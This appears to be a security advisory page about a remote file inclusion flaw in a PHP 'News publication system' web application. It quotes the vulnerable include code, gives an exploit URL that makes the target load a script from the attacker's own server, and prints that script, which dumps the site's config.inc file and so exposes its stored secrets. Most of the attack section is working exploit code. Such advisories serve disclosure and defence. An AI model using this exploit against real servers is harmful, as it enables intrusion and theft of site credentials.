News publication system remote File include

2006.11.10
Credit: navairum
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 5.1/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 4.9/10
Wymagany dostęp: Zdalny
Złożoność ataku: Wysoka
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Software: News publication system -------------------------------- Description: News publication system provides a mechanism for news blocks publication on site in conformity with rules and templates set. Provides a mechanism for adding news to the system and news management. Provides a mechanism for system management functions access control. ------------------------------------ Site: http://sourceforge.net/project/showfiles.php?group_id=27445 ----------------------------------------------------------- The variable $path in class.Database.php isn't defined before it is included. Register_Globals must be on. Vulnerable Code: if ($path!="") include $path."config.inc"; else include "../config.inc"; ----------------------------- Exploit http://[SITE]/newsp/lib/class.Database.php?path=http://[your server]/jacked.txt? ------------------------------ Jacked.txt <?php $file='../config.inc'; $handle=fopen($file,'r'); while(!feof($handle)) { if($handle) { $data = fgets($handle,filesize($file)); $data.='<br>'; } else { echo 'handle failed'; } echo $data; } exit(0); ?> Navairum legalize it


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top